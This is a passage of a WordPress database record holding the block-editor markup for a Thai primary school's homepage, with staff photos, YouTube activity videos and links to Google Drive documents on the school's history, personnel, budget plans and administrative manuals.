(500,1,'2025-06-27 13:47:08','2025-06-27 06:47:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0f4859-9f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0f4859-9f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  